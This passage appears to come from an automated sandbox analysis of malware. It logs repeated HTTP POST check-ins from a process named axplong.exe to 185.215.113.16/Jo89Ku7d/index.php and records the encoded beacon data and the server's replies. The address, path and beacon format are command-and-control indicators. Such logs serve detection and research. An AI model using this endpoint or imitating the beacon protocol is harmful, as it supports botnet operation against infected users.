                    Date: Fri, 26 Jul 2024 19:03:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.749768185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:43.755846977 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:44.513744116 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.749769185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:45.188499928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:45.962135077 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    64192.168.2.749770185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:45.981333971 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:46.764130116 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    65192.168.2.749771185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:46.889712095 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:47.736777067 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:47.749592066 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:48.050040007 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    66192.168.2.749772185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:48.612116098 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:49.350050926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    67192.168.2.749773185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:49.363379002 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:50.111913919 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    68192.168.2.749774185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:50.234698057 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:51.013109922 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    69192.168.2.749775185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:51.067388058 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:51.818286896 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    70192.168.2.749776185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:52.275566101 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:53.046051025 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:53.049216032 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:53.313394070 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:53 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    71192.168.2.749777185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:53.437141895 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:54.224699020 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    72192.168.2.749778185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:54.652141094 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:55.673037052 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:55.673719883 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:55 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    73192.168.2.749779185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:55.807981014 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:56.588874102 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:56 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    74192.168.2.749780185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:56.605664015 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:57.380116940 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    75192.168.2.749781185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:57.505314112 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:58.283596039 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    76192.168.2.749782185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:58.549084902 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:59.321396112 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:59 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    77192.168.2.749783185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:59.433690071 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:00.194206953 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    78192.168.2.749784185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:00.202991009 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:04:00.958013058 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    79192.168.2.749785185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:02.261363029 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:03.035535097 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:02 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    80192.168.2.749786185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:03.049567938 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:04:03.874830008 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    81192.168.2.749787185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:04.007189989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:04.806941986 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
